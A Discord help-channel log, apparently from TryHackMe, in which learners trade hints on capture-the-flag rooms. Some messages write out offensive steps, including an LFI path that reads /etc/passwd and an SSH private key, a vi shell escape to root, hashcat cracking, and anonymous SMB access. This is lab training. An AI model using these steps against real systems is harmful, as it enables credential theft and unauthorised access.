Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

oof

😭

that hurts 😭

can i get a hint or even i cant ask for help on jacobtheboss

bcoz i think its also a new room

It's been a couple of days

but this root me one

its broken or something

i uploaded it 14 diffrent times

You have asked. But if people haven't completed the box, they can't help you @hollow forum

@white salmon Elf it aint broke, it was tested and loads of people have completed it

it doesn't love me

then

@white salmon I was having the same problem that’s why I left it

its so hard

like what is the problem why cant i upload it

Oh wait I know what you mean no I had that problem once then it worked

How long till a room is not considered "recent" anymore and can ask questions? 🤔

Whenever the room creator allows it or when writeups are accepted

@white salmon if i know what u mean its not a bug youre just doing something wrong

How long till a room is not considered "recent" anymore and can ask questions? 🤔
@white salmon 2-3 days generally

oh if so im just wondering in the room Jacob the Boss in the privesc part using|| the C.O.W. exploit is the correct path or im wasting time? Because im messing around with the code as it seems to get stuck in some part and won't actually add a new root user as its supposed (one of the variants of the exploit). And im almost giving up this path.||

oh if so im just wondering in the room Jacob the Boss in the privesc part using|| the C.O.W. exploit is the correct path or im wasting time? Because im messing around with the code as it seems to get stuck in some part and won't actually add a new root user as its supposed (one of the variants of the exploit). And im almost giving up this path.||
@white salmon That's not the exploit..tried it several times too...

oh good to know, gave up on it already

OH JESUS CHRIST IM SO blind 💀

OH JESUS CHRIST IM SO blind 💀
It was at this moment that bob knew, he rooted-up.

happy hacking guys
any idea with the Jeff's room user.txt answer field?

You need to do something to the text

can i ask u privately for avoiding of an spoil?

Nope, because I can't give you any more info without spoiling it.

OK

done it
that was annoying

but the room was amazing after all
exept the user.txt part

did anyone here solved "jacob the boss" room?

Just ask directly

If someone can help, they will.

Mark as a spoiler if you need.

i wan

did anyone here solved "jacob the boss" room?
@dim hare i want hints about the privilege escalation of this room? , i was able to connect with two different users , i did a lot of enumeration i searched for kernel exploitation but it didn't work to get root or read the file and i was able to get hashed password but what i did is that i changed to connect with the other user because i was not able to crack it or can i?

Priv escalation on that box is basic enumeration you can do it manually or use linpeas just look at everything carefully
If you're still stuck check out ||SUID FILES||

@dim hare

Priv escalation on that box is basic enumeration you can do it manually or use linpeas just look at everything carefully
If you're still stuck check out ||SUID FILES||
@eternal brook okay , i did but i am going to look in depth.

Im still stuck on Mr.Robot CTF. I cant for the life of me figure out the reverse shell...Either my ip config is jacked up or I did something wrong

@woven mirage or you online

?

hey good eening got a ? about your WWBuddy room did you change the sqli payload attacck because its not working for me

Well, the sqli is not that easy to find

Try to think about everything that is input

In this situation you have to prepare the attack before for something tô happen after

Im still stuck on Mr.Robot CTF. I cant for the life of me figure out the reverse shell...Either my ip config is jacked up or I did something wrong
@ashen scaffold what are you doing

@oblique cliff trying to get this reverse shell working.

Looks like james is helping you in #room-help

I think my issue is within my network config. I need to see if i can get a reverse shell elsewhere first

He is i was just replying to you. Thank you :)

I will test other things some other time. Im literally getting a headache from that room lol

👌🏿

does anybody have a hint on how to scalate on tryhackme/room/jacobtheboss, i could connect as jacob and apache user, but i don't find how to privesc this pc

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

@wintry yarrow Hey, it's been a couple of days now. Please bear in mind Rule 15 and leave enforcing the rules to the moderators.

@mighty pagoda there's a hint in this channel about 3 hours ago

Sorry about that.

i'm sorry guys, i haven't read the rules

but i will i promise

Buffer overflow 3, is there really that much badchars or am i missing something?

@patent token Hello! In regards to the box "Relevant"...Should windows-exploit-suggester.py have pointed to the exploit you used in the write up? It didn't find it in my case by using exploit suggester. Or was this more of needing to do a google search based of the privileges you enumerated after getting the shell to discover it that way?

Afaik it's not an exploit per se, just abusing the privileges you have so the exploit suggester might not take it under consideration

I see. I was just trying to get the correct thought process behind discovering to use that priv escalation technique.

A useful thing to do on linux/windows after getting a shell is checking your groups and privileges, you might not need a exploit suggester after all :)

Yeah, after doing a google search based off the privileges found it lead me to the priv esc method 🙂

Off to bed. until tomorrow

does anybody have a hint on how to scalate on tryhackme/room/jacobtheboss, i could connect as jacob and apache user, but i don't find how to privesc this pc
@mighty pagoda /4000

just read with attention the enumeration output, it took me a couple hours because I missread it

Is anything related with ||NFS ||? @white salmon

no, its related to permissions

K

can I pm you for a sec @white salmon ?

sure

please help

Read the question

Be specific

Read the manual

Google it.

@pure thistle just take the sql injection and paste it every where you can, eventually itll work

Need hint on Year of the Rabbit room. ||Got ssh shell as eli and couldn't find anything much suspicious so tried linux exploit suggester and saw it is vulnerable to dirtycow and dirtycow2 so I ran it but it crashed the machine.||

Kernel exploits should always be your last resort

Do traditional privesc enum

Linpeas?

Or do it manually

Thinks like enumerating sudo rights, suid binaries, binary capabilities

Okay let me try, thanks.

||I've found 4 custom suid's but only /usr/lib/pt_chown looks suspicious.|| Am I on right track?

Nvm its not useful.

Still can't find anything super interesting. Need another hint.

Hello everyone.

I just wanted to point out that the github link to LinEnum doesn't work

#room-bugs and provide more information.

This is in the Linux Privilege room in the Linux Beginner room.

Ok. Will do. I was just wondering if anyone else was having this problem installing LinEnum. When you type git clone in front of the address, nothing happens

Ok that's different

You said the link doesn't work

Not that you can't get git cloning working

Being specific and accurate is really crucial if you want help. Can you provide a screenshot of what you're doing please?

Ok. I am typing this in on the THM VM. Also, my target is not the THM VM, but my own Kali Linux VM. SSH isn't working on my end. SSH is timing out.

That's not your target

@wintry yarrow I don't think it's too hidden iirc

And whatever you're doing, it's confusing and weird

just some regular enumeration should work

@analog fiber The VMs on tryhackme don't have internet access. You need to download the script locally and copy it over.

Oh, ok. That could explain why when I try to copy LinEnum over to my Kali Linux VM using SSH (I am using VMware Workstation), it times out.

Wat

||I found two suspicious directories with linpeas but I think that's just another rabbit hole. And got 4 custom suids and some db and 2 services running locally. That's all. Also, there a core named file on home directory.||

Copy it from where to where, and how? @analog fiber

Well, I am using the THM VM to get LinEnum on my target machine (which is my Kali Linux VM)

That did not answer any of my questions

Your target machine is not your Kali machine

Ah, so it has to be the THM VM?

It?

The target machine

The target for what?

You're being really vague where it matters, and really specific where it doesn't.

You're not providing screenshots. You're not answering questions. I'm going to give up in a minute.

@wintry yarrow ||sudo -l||

||I found two suspicious directories with linpeas but I think that's just another rabbit hole. And got 4 custom suids and some db and 2 services running locally. That's all. Also, there a core named file on home directory.||
@wintry yarrow If you are still stuck on the first user, you should see something interesting immediately when you ssh-ed in.

@oblique cliff It shows its not in user in not sudoers iirc.

@orchid fossil Yeah, I saw that but can't find the ||place||.

yes you can find it.

Ummm ||find||, gotta try.

wait which user are you

Eli.

oh my b

ok did you see the message pop up when you first got into the box?

Yup.

Yeah, I saw that but can't find the ||place||.

maybe ||gwendoline owns it||

i dont actually remember thats just something to try

||find / -uname gwendoline 2> /dev/null||?

Or something like that.

try it on something you know should work

so do that same command with Eli and see if it gives back what you expect it to

find command right?

Let me try.

yes

Can someone provide a nudge for the root part in Jacob the Boss room? I've turned like every stone and couldn't find anything.

Run some enum scripts

Look for sudo rights, suid binaries, capabilities

I gotta be blind then. Sudo I obviously can't do anything with since I don't have jacob's password and suid and sgid binaries are all default ones

@stuck fractal

I can't really help more

well, I'm overlooking something by a lot

let me try again

I am currently doing the "Upload Vulnerabilities" Room. I am kind of stuck at Task 9. I managed to upload my shell by changing the Magic Number to the one that GIFs usually have. However now that i try to execute it throws the following error: The image http://magic.uploadvulns.thm/graphics/shell.php5\ cannot be displayed because it contains errors." Did i do something wrong?

And i have netcat open but i dont think that the shell executed

Does someone have a hint for me?

The task mentions this: This task will not do so to keep it relatively easy; however, directory indexing has been turned off, so you will not be able to navigate to the directory containing the uploads. Instead you will need to access the shell directly using its URI.
Is my path maybe wrong and it just throws a weird error (contains error=maybe the shell is saved somewhere else?)

Room: Crack The Hash
Task 1 #4
Im runing the hash through hashcat but it has been over an hour, is there a way to do it more efficiently?
hashcat -a 0 -m **** ~/path to/hash.txt ~/path to/rockyou.txt

That's bcrypt

It's going to take a while

oh

Use what you know about the plaintext to speed up your search

You know that it's 4 characters

And you know it's in rockyou

okay, thank you 🙂

@wintry yarrow what was the message when you first sshd in

||Message from Root to Gwendoline:

"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"

END MESSAGE||

What’s the keyword in there

||s3cr3t ||?

Yea

If you couldn’t find it with find try locate instead

I tried find already.

If you couldn’t find it with find try locate instead

Oh, no.

Locate worked.

Yay!

Why sad?

Happy!

Thank you. And sorry to trouble you.

No trouble at all 🙂

Also a hacky way to do it if you’re unable to form a good find statement is something dumb like ||find / | grep s3cr3t||

Better to learn the find command but whatever works works @wintry yarrow

Idk if that’ll work btw I think it should tho

Don't pipe find into grep ewwwwww

We teach hacks that work here

I tried something like find / -type d -name s3cr3t 2> /dev/null.

It's not difficult to do it properly, so do it properly

You needed a regex

You were trying to find a file or directory with that exact name

You need like *s3cr3t*

I misspelled I tried like * secret *.

wrap it in backticks

*secret*

Discord removed *.

*secret*
That's what I tried.

Backticks in discord

*secret*

Yeah, need to place inside em.

'*thing*'

Just make sure shell globbing isn't messing with you

No

Not backticks there

single quotes

Still can't find the directory.

Anyway locate works.

I guess I can't rely on find from now on.

no you can rely on find, you just have to use it right

Still locate is simple.

find is more powerful

So is Vim. But I prefer nano haha.

Tell me how to close vi lol.

just do find / -name "s3cr3t" 2>/dev/null

does that not find it?

:wq lol

@stuck fractal

You saw nothing

does that not find it?
Nope.

Seriously I can't quit vi.

escape then :q!

Ha that worked. Thanks.

Esc, :sh

No need to leave vi to get to a shell

lmao

Nope.
@wintry yarrow show me

No need to leave vi to get to a shell
Thanks, got root.

I was trying something different with vi.

Oi

whatd we talk about

delet

But also you showed yourself using that earlier

plz delet spoil

Here's Blob's knife.

Okay, sorry.

Just wanted to let you know it worked.

But also you showed yourself using that earlier
@stuck fractal where?

I'm trying to do the OWASP Juice Shop room, but all the answer boxes look like this with no question

So how do I know what I'm supposed to use as the answer

try refreshing the page?

It's meant to look like that

It's the for the flag that the webapp gives you when you complete that activity

where do i find the flag

i've seen a couple of the notifications so far

It will be a popup

Once you have completed a task in Juice Shop a popup will happen and you will get your flag

Ah I see

I was coming from the previous Burp room that let me just deploy it on heroku and use that

Hey everyone. I'm stuck on Relevant. I have done some smb enumeration and have found a passwords.txt file and now have 2 credentials. Can't seem to do anything with them other than login to smbclient. Have tried to RDP into the server. doesn't seem to work. psexec.py doesn't work either. Have tried manual EternalBlue and also tried EternalBlue using Metasploit. no luck. I'm looking for a nudge. Am i going down the correct rabbit hole?? Thanks in advance

It's not blue.

Tell me about what you’ve scanned so far.

I can give you a hint based on that

ahhh so i was going down the wrong path!! i thought so as nothing was working

The entire purpose of the challenge is to make a big stink over something that is seemingly obvious, and force the user to know when what they’re doing just isn’t going to work.

So you’ve tried the smb creds, eternal blue, etc. and nothing works. Go back to your initial scan and look it over. Was it thorough enough? Have you checked and enumerated all services? Etc.

nmap showed port 80, 135, 139, 445 and some other bigger ports one was another RPC and i can't remember the other one. used gobuster and wfuzz and pretty much determined that there is next to nothing behind port 80. then went onto smb enumeration and then tried EternalBlue

I’d take a look at those upper ports again. That’s your hint. 😁

one thing i didn't do was scan udp

No udp

i didn't think so

i got some practice executing eternalblue anyway

What port numbers do you see in the upper ones?

Can use spoiler tags if you need.

this is from memory so i might miss one. 80, 135, 139, 445... then there was windows terminal services in the 3000s i think... i don't have my hacking computer next to me

So it’s important to do a full port scan. All 65535.

When you have a chance try that.

i did see a really big one i think it was rpc... i did -A -p- so i should have gotten them all

Check your notes if you took them. You should see your next step.

ok thanks. just backing out of the EternalBlue path i was on should get me going again.

😁 enjoy! If you get stuck any further feel free to ask for another hint.

ok thanks!

Hello I'm stuck on Burp Suite Room Task 10 number 2. I'm not sure what should I do. Can you help me pls

What's wrong?

I don't know how to dig for a response issues a cookie

That's what you're going to leadn

There's an instruction

Got it, thx a lot!

@patent token recently visited ur github page, mate
keep up the hard work 🍺

That's a brand new room

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

Please wait a few days before asking for help with new rooms @gusty turtle

That's a brand new room
@stuck fractal 45 days old?

It was released today.

It's a brand new room.

Oh Ok

why is it showing 45 days old?

Because that's when the room was created. Not when it was released.

That's being fixed.

#announcements you can see it was released in the last 12 hours or so

Oh ok.

Because that's when the room was created. Not when it was released.
@stuck fractal

Need a hint on Lian_Yu, cant find first dir

The very first task ? Can you not run the command properly or you don't see the directory @dire zinc

Also, which wordlist you used

Yea, medium... something

Be specific

The directory is in /dirb/big.txt for sure, can't say about the wordlist you are using

@final mortar only found /island

kinda stuck on that

Have you tried re-busting the directory you found ?

thats what im doing rn, so far nothing

Don't you think you should wait for the scan to finsh before asking for further help 🙂

can someone help me on iron corp please?

Check pins

@delicate timber If you are looking for hints, then you need to keep decoding it further, you are good till now

more layers... wow, okay thank you

Got it thank you!

where can I find the format to ask for hints here?

To ask for hints you ask here

Ok. Didnt want someone to grill me if the question needed to be a specific format...

Check the pins for at least a loose guide

Try to mark things as a spoiler if you need to.

I am in room/ccpentesting
task 18 question 6
checked walkthroughs

did a dump of the db on question 4

Check the pins for at least a loose guide
@stuck fractal exactly what i needed. thanks

If you've checked the writeups and want more than just a hint, #room-help is better suited

the walkthroughs were no hint lol. 1 link is dead and the other only covers some "final exam" section of room. Still need to go to help?

Depends if you just want a hint

yes just hint .

Ok, so where are you stuck?

room/ccpentesting
task 18 question 6
cannot find the flag. doing a dump does not return expected results. not sure if I should stay in scope of question before or broaden my scope

Might be the wrong table

hmm. I dumped all tables in the DB in scope of question 4. they look relatively the same.

you can add --sql-shell or something and run queries manually

I'd recommend that tbh

I'll give a shot thank you

hmm. I dumped all tables in the DB in scope of question 4. they look relatively the same.
@serene light oh no just dump, I did the same, took forever but dump not dump-all

@serene light oh no just dump, I did the same, took forever but dump not dump-all
@delicate timber I must be doing something horribly wrong. When I --dump the tables in the db from question 4, but those values dont make sense to me (trying not to give anything away on accident)

I head over to #room-help .

Hi all , in PowerShell scripting room , which command can i use to get “cmdlets installed on the system only cmdlets not functions and aliases”???

What about which google dork to use

did you do the google room?

No

I am doing cc pentesting

Please don't show answers @strange cliff

But I would recommend reading manuals and doing research

Sorry bro

I was asking for help / hint

How can i find a redirect page

to a website

im doing agent sudo ctf

https://tryhackme.com/room/agentsudoctf

hi guys anyone facing issue to transfer file between kali and the windows 7 client provided to rdp into?

@strange cliff Please don't call me bro. You don't know me and it implies an uncomfortable level of familiarity. One of the rules here, rule 13, essentially states that you should do your research before asking. I gave you a hint.

i am doing windows privilege escalation

Looking at the main page of the website you have your hint there and check out who has written that note for you.
Play around with ||user-agent|| to find something juicy

@nova nest

As far as I remember you meant asking this in the 2nd ques

the main website doenst have nothing

its just a simple html website

i will try changing ||user-agent||

i will try changing ||user-agent||
@nova nest then you're on the right path and get something

how to find open ports in disk image? like any plugin with volatility?

I need some hint in Forensics room Task 2

@teal belfry Please google before asking here.

Ask your question and someone may answer.

Heya! I'm doing basic pentesting, and in the hint for the username question it said to use smb to find the username, but I've used countless programs and have gotten hopelessly lost trying to find it and was hopeing someone could give me a little nudge in the right direction ❤️

@bitter laurel Have you tried some slightly more manual enumeration?

Names etc are often exposed in notes and documents

Ah, once second 😄

one*

Yeah, I thought so. I looked at the 2 documents that where exposed to me but I could only find the first letters of the usernames, which where J and K respectivly

Unless I'm missing an elphant in the room 😄

You should get slightly more info than that

The only thing gobuster threw up was /De********

dont wanna spoil it

Not gobuster

Try logging into the smb share

I don't beleive I have any credentials to do it D:

I'm super new to it so I'm probably missing something really dumb

SMB can have Anonymous login enabled

Like FTP

Authenticating with username+password as "" or "Anonymous":""

would smbmap be the right tool?

Nope, just smbclient should do after you list shares

hey man i recommend using enum4linux.

it helps alot with enumeration

There are re-written versions that are better

link

?

am I doing it right?

smbclient -I 10.10.4.187 -u "" -P ""

I get 'not enough / in service' D:

//ip/share

?

oh

one sec

smbclient //ip/10.10.4.187 -U "" -P ""
Failed to open /var/lib/samba/private/secrets.tdb
ERROR: Unable to open secrets database
Failed to use machine account credentials

oof

No

ip is the ip

share is the name of the share

so share can be anything?

I'm so lost 😄

You can list shares

You're a subscriber, I'd recommend doing the Network Services room

Yeah, I am 😄

Hello! Similar to how you can break out of a "jail" shell on Linux using a command like** python -c 'import pty;pty.spawn("/bin/bash")'**, is there something you can do after getting a reverse netcat shell on a windows box? Something to make the shell more stable maybe...

Screenshot what your shell looks like

It would be nice to be able to send a Ctrl-C inside the shell without killing the connection. Not sure how to do that

use something like pwncat probably 🤷‍♂️

Anyone solved the machine relevant? I am having trouble looking for the second path to root. Can't find the second priv esc technique...

Room/Task/Number

The room is "Relevant" .. it says there are two paths to root but I only found one (the one in the write up)

It only pertains to initial access, not the privesc.

ahh ok

room: ZTH: Web 2, Task 11. I've tried both dirbuster and wfuzz to look for a php file using big.txt, but i've only found 3 files, which don't seem to show any sign of command execution. Any hints? I've tried both of these patterns || ip:82/FUZZ.php ip:82/api.php?cmd=FUZZ||

Room Lian_YU

For finding hidden directory they given a clue
Only contains numbers and it was 4 digit
I tried with 4 digit wordlist for finding directory
But nothing found😭😭??

What do you mean by 4 digit wordlists

also, make sure you are dirbusting at the right level

https://tryhackme.com/room/owasptop10

trying for the bonus. which i'm sure is no longer a valid subscription, but its driving me nuts

I believe there was an email

for day 3

?

Yes

You emailed and you got the code

would you mind explaining to me how an href email is considered subcode and anything other than ridiculously obvious?

boy i overthought that one...........

Yeah you just emailed and Muirland would reply with the code

But it's over now :/

is a HREF link really considered subcode? i was thinking something linked to the dynamic HTML changing the HTML templates based on the username

wut

"If you know what a "subcode" is, and that's why you're here, kudos for the ingenuity! "

i just don't get the hint or the link....but i'm the newb so maybe over my head

There's an email in the room

that you find

And when you find the email

yes i found it in 2 mins

Yes

reading the source code of the hmtl

People thought it was a fake email

But it was real

didn't think that counted as ingenous

and when you email it

You win

But

It has already been claimed

oh well, thanks for ending the rabbit hole 🙂

and to the one guy on youtube who mentions it

Hei im stuck at Upload Vulnerability Room

Which part :D

Looking for A Nudge I'm at last part

Unable to Capture Shell

Hints are provided by Muirland

Tried all Man Uploaded a shell Dir searched using Gobuster 5 files found

Yea man i am Already looking at it but Still stuck

I am At Admin Page

Hints Says ../content/Filename.jpg

But tried all combination nothing found

What happens when you do it

Module Does not Exists

?
Any nudge

Hey every1 just got user and root for hackpark but didn’t go the route the rooms wants and have no idea what “abnormal service” I’m looking for - RDP’d in as administrator for flags...

(WinPEAS found the creds)

Run power up and see if there are any weird services

Sorted it thanks 🙂

anyone here finished jokervm?

Just ask your question 🙂

well , i'm looking for any sources to learn about LXD Privilege Escalation cuz i almost finished the room but i stuck in the root part

Have you typed "lxd privilege escalation" into google? There's some good articles just a click away

I know, but I'm still looking for something suitable for a newbie 😆 anyway thanks dude

hackingarticles @buoyant wind

https://www.hackingarticles.in/lxd-privilege-escalation/

doing ignite, I've located this exploit: https://www.exploit-db.com/exploits/47138

I'm having an issue with it, based on what I'm seeing in it, url gets changed to the box, but where is proxy supposed to be pointing?

I don't think so that's the right exploit lemme check my notes once

Typically, when an exploit uses a proxy you'd have one running locally

IIRC you can just edit it out so it doesn't proxy anything

ty.

yeah, that worked, thanks James.

I'm sorry yea that's the right exploit :)

Has anyone finished "MAL: Researching" (https://tryhackme.com/room/malresearching) ? Task 4, Question 3. I have the correct date, but even with copy/paste I can't get it to accept it. Is there some trick to it that I'm missing?

in room snowball is ftp supposed to be slow?

no tips, room just released

wow

Hi guys, quick question. Looking at the Burp Suite room and struggling to understand what the answer would be for question 4 on 'Puttin it on Repeater', I get a message in the browser to say that I solved the challenge, but can't find the answer that would fit the format of the length required, any help appreciated

Could you screenshot the webpage saying you completed it?

:))

OK, so another one in the Burp Suite room, looking at sequencer and performing analysis on the Set-Cookie request, the question is In order to find the usable bits of entropy we often have to make some adjustments to have a normalized dataset. What item is converted in this process? - struggling with this one, looking on the Bit Level Analysis tab and still can't see anything that mentions this

well bloomin' hell, got it finally 🙂

anyone one knowing about ||Lorem Ipsum|| ?

It's generic example text @sick sun

But I believe you have been asked before to follow Rule 13 and not ask for help on new rooms

is the creator of snowball in the chat. Want to double check that your room isn't broken...

@livid perch it's broken

What part, if that isnt sarcasm?

Idk what part

I just know it's broken

The privesc is broken

It was changed after it was tested, discussion came up in room tester chat

@stuck fractal regardless can I get myt 7 hours of life back???

MAD

Ok so Privesc part is. I am not up to that

Unfortunately I cannot provide that service

I demand justice

I also didn't test it, please don't shoot the messenger here

lol

I mean even if you did, it isnt the testers fault because it was changed right?

Ideally the tester should be told and then retest it

reset our progress?

hope not

oh retest I can't read with no sleep

yikes

need hint for Tartarus finding location of uploaded file

@dire zinc enumerate more

what do you do when first enumerating a website? try that

tried gobuster

Maybe you didnt use gobuster correctly

try using it again, recheck your command settings, maybe something is missing or a part is missing?

ok ty

how to i type something but make it hidden is discord

use || at start and end

|| like this ||

|| gobuster dir -u 10.10.57.137/sUp3r-s3cr3 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 20 ||

This look right?

nope

its wrong. very very slightly

look it over

holy f*ck do i feel dumb

we all make mistakes, and staring at the same thing over and over youll over look it

i let that run for 30 mins 😆

fixed it, found it in 2 seconds

i have a problem with the room ps empire

my exploit gives a fail

it was completed but didn't give a session

What did i do wrong

is LHOST correct?

was filled with a 192 address

😛

working now?

i'll try it in a minute thanks

that was the problem thanks I'm so stupid

man, it's just like that sometimes.

I did something similar yesterday. lol

yeah it is that kind of day

any hints for privesc on gamingserver

any hint for golden eye task2 #3 ? i must be stupid, i thoguth i tried it all but i probably miss something obvious. got all the rest of it haha

any hints for privesc on gamingserver
@dire zinc Look at the groups and look at what you can do with it

any hint for golden eye task2 #3 ? i must be stupid, i thoguth i tried it all but i probably miss something obvious. got all the rest of it haha
@trail compass It's most probably a command that you used for that port

hm ok maybe i forgot what was there, put the thing in i think i used and it was indeed correct. but i thinik running there was something else... but finally complete 🙂 thanks

any good tool to do web directory enum on "Relevant"? Tried gobuster, but kept getting "Client.Timeout exceeded" even on default thread setting

doing the xmas challenge, I'm on day 4 and I'm struggling with the mcsysadmin's password hash, I don't even know why

Google just brings up results for how to generate them, I've found what looks like a hash in known hosts but now I'm just stuck.

Have you got the hash and you're trying to convert it?

Or are you trying to find it?

trying to find it

(It's been a while since I've done it)

it says "What is mcsysadmin's password hash"

Have you tried using find or grep to look for a password?

i did grep a password from a file.

i can not for the life of me use find correctly yet.

try to look for a shadow backup file

oh thank you! i knew there was some reason for that in the supporting material

Does someone have a good resource for the find command, or is it more just trying to work it out using the manual because 99% of the time I just end up recursively searching everything.

There's a room dedicated to find https://tryhackme.com/room/thefindcommand

I'm absolutely doing that after I finish this day then.

I imagine also a few cheatsheets out there in both #resources and the internet

cough man find

hehe and that!

I've looked at man find as well @white salmon

but my brain implodes everytime for some reason

If you're really really stuck with it then I find checking out Muirland's writeup helped me, although I try not to if I can help it as I like to work it out on my own.

I should mention in the interests of fairness there are other fantastic writeups too.

We both know that you're bias towards Muir though 😛

Ssshh he'll think that I actually like him then his head will swell.

is definitely getting banned.

It's the last thing we need 😉

Haha.

Hi, in nmap room, is the hint of the question 3.4 wrong? It says you that the version starts with 6, but with the nmap option for seeing the version of the service the version has some numbers and no one stats with 6

What parameter did you use?

-sV -p 22 -v

I have accomplished the questions but with a version that is similar to which nmap shows me but not the same, is older

Can someone please assist me with "LFI Walkthrough" Task 2/ question 6. I feel extremely slow right that I'm not understanding the creators question. They're asking which file can give you access to falcon's account on the system. ||[hint=Try to read private key file in '.ssh' folder under falcon's directory.]|| Reading that, I tired to ssh into the machine; no luck. Viewed the page source for better clarity when I entered ||../../etc/passwd|| on the browser, still cant find the|| .ssh folder||. I'm lost right now. HELP PLEASE. ..... Thanks.....

Its in Falcon's home folder.

@wintry yarrow I'm having issues getting there... You can DM if you'd like.

If you want ssh key its in ||/home/falcon/.ssh/id_rsa||.

Can you read the /etc/passwd file?

Yes, I see the output on the webpage for ../../etc/passwd

traversing from there is my issue

Then try this ||../../home/falcon/.ssh/id_rsa||.

Okay that worked!

Great. Now, you know what to do next.

I'm attempting right now. I should be able to ssh into the IP with this key, correct?

Yup.

Room: Lazyadmin Task 1 #2 I have a reverse shell and a mysql login info but I'm not sure where I can go from here. Trying to privesc with pwncat but I can't get that figured out either. Don't see any 4000 perms SUID files

||sudo -l||

I saw the .pl but I have no way to edit it

cat that script and see whats it doing.

with 'easypeasy' are we soppose to attack nginx.com or nginx.org???

What do you mean by attack .com, org?

like. gobuster, nmap so on

Yeah, but please do attack on room machine and not on actual nginx site.

ok ok i see

So the file listens on 5554 but on a local network ip

Check that file's permissions. Maybe you have write access.

Well echoing into the file didn't work, cat perm denied me haha

ls -la file.

Let me rephrase, it let me echo but I echod cat /root/root.txt but it doesn't run with privs

It already have shell code just place your ip and listening port there and get a shell.

Also, you have to run .pl file as sudo inorder to execute as root.

and make sure you use the same dir as sudo -l told you to use

ooooh

Man everytime I think I've learned something I just smash my face against seemingly simple problems

That's life man.

Thats what im doing rn...

It’s hard to tell what you do and don’t know @pine hazel, once you hit a wall everything falls apart :p

Lazy admin took me like 2.5 hours

It took me about the same when I did it :)

for 'easypeasy its says to just use gobuster and i have sit here for 20 mins and let it run to find bassicly nothing, could i be doing something wrong?

what gobuster command did you use

gobuster dir -u 10.10.212.106 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 20

found || /hidden ||

but cant do much with it

Did it scan all the options?

wdym

like -x?

Did your scan complete and only find that one subdirectory?

you can also scan those subdirectorys 10.10.212.106/xxxxx

its at 43% rn been around 25min

I would go to a smaller list

like /dirb/common.txt

ok ty

will be about ~4k options instead of however many that is

ye a lot faster

when I first gobuster I start with common or big.txt

found || /whatever || but still no flag

||source code||

ye got that but no clue how to decode it

cyberchef.

ty

any good tool to do web directory enum on "Relevant"? Tried gobuster, but kept getting "Client.Timeout exceeded" even on default thread setting
@quiet elm any help on this?

dirsearch, dirb, dirbuster.

i have used gobuster on || ip, /hidden and on /whatever || and found nothin

You got ||flag|| right?

ye first one

Enumerate other web servers.

dirsearch, dirb, dirbuster.
@wintry yarrow I tried dirb and gobuster. Kept getting timeout, even after I increased timeout setting to 10min, running on only 10 threads

got same issue using attack machine too.

I seen the video walkthrough, but just wanted to see if I am able to run it on my own

without getting the timeouts

Are you connected through vpn?

tried both vpn and attack machine

same results it seems

Show screenshot of what you are doing.

u want to see from attack machine or vpn?

Any will be fine.

Just wanted to make sure you are running the right commands. Also, what room are you doing?

relevant

I've heard Windows boxes currently have problems. Wait for thm staff, they will help you.

haha, i see

the video walkthrough was running 100 threads, and I only ran 10 threads.

didnt have issues with other boxes, so you could be right

I have tried using burp to replace the useragent on all ports, trying cracking the hash with hashcat and all wordlists i got and tried using gobuster and setting the custom user agent

got nothing...

||Analyse web server, look for source code.||

I'm bashing my head against a wall trying to find the binary to use on day 8 (task 3) of the 25 days of xmas challenges.

I've found the binaries that have the suid flag set, i guess I could try them one by one lol

@wintry yarrow I got the || user agent md5 hash in the source code but idk what to do with it ||

Google decode md5 hash.

think ive been through 10 websites

nothing

I don't remember site, its actually like md5hashing.net or something.

@dire zinc , why not use hashcat or john for a md5 hash?

You can use it

But try using an online decoder before

Just to save time

That too.

tried hashcat first

got nothing

||https://md5hashing.net/hash||

im on there now, been decrypting for like 5mins

why is this not working? || hashcat -O -d 1 -m 1400 '940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81' /usr/share/wordlists/rockyou.txt ||

i have been trying to this hash for an hour with the website recomended to me and its still going

Did you look at hashcat examples?

Have you looked at the manual for hashcat? Did you try Google?

Darkw is giving you the answers, how much research have you conducted in your own?

yes

a

lot

I need some hint for OWASP Juice Shop, Task 3 - question3 , I was able to download the required file by bypassing the 403 error but could not find the flag

im even using the same website that was in a write up

still aint cracking

Well when I use hashcat it isnt like that, but maybe I use it differently then. I went off the hashcat manual examples at the bottom as well as examples I have found online when I was learning that tool

i was told to use || https://md5hashing.net/hash || abd its been cracking on there for well over an hour now

Hey Fox.

It's an MD5 hash right?

nevermind

If you have tried the same thing for over an hour, maybe you are trying to wrong thing. Look up a hash cheat sheet and visually compare them, maybe you're not getting the right results

I'm gonna have a gander at this room now.

got root, not a fun box

eh, it isn't that bad tbh

once you get a shell its fine, just getting to that point is so messy

like for task 2 flag, im still decrypting it with the website i was suggested. been almost 2 hours

that's because the encryption type is not what you think it is when using a hash analyser 🙂

so not md4 or md5?

ahahahah it just cracked

it was md5

only took 2 hours but got it

the one in the source?

940d one?

nah the a186 one

flag2?

yep

i can't even recall how i did that one tbh.

that box is not that bad

Hey all I`m having real issues with OWASP Top 10 Task 27, I have carefully walked through it and still cant get netcat to connect. Initially I had an issue with the version of netcat which I think I have sorted. Feel like I have been through this task 1000 times checking everything as I go

